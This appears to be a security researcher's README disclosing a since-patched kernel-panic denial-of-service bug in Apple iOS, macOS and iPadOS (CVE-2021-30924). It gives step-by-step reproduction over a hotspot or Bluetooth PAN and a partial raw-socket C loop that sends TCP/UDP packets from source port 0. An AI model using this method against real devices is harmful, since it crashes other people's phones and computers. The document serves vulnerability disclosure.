This repo demonstrates the method to cause kernel panic (DoS) on iOS, macOS, iPadOS devices by sending 2+ TCP/UDP packets from attacker device via apple device hotspot net to external network. The issue was discovered at , was reproduced on at september 2021 and was reported to Apple at 14 september.
UPD:
- 25 Oct 2021: Apple has fixed the issue for iOS and iPadOS 15.1 and macOS 12.0 without any kind of public acknowledgement to our team.
- 18 Nov 2021: Apple mentioned our names in CVE-2021-30924 only for macOS, without any other communication with our team.
Kernel panic after send 2+ TCP/UDP packets by attacker device via apple device hotspot net to external network
- Switch into hotspot mode
- Attacker connect to iPhone network
- Attacker send 2+ TCP/UDP packet from source port 0 to different destination ports in external network.
- Kernel panic
- Require internet access on device
- On "Internet sharing" (on Bluetooth PAN) on victim apple device
- Bluetooth pair attacker and victim apple device
- Attacker connect to internet via apple device
- Attacket send 2+ TCP/UDP packet from source port 0 to different destination ports in external network.
- Kernel panic
We used raw sockets to form a custom package and send requests from port 0.
...
tcph->source = htons (0); //here we specify the output port 0
...
while (1)
{
tcph->dest = htons (rand()); //here we specify the input port random
if (sendto (s, datagram, iph->tot_len , 0, (struct sockaddr *) &sin, sizeof (sin)) < 0)
{
perror("sendto failed");
}
else
{
printf ("Packet Send. Length : %d \n" , iph->tot_len);
}
sleep(1);
}
...
After sending 2 packets(print "Packet Send..."), DoS is called and elf execution can be terminated.
Linux-based systems. (tested on Ubuntu 21.04)
Elaman Iskakov - @darling_x0r Alexey Katkov - @watman27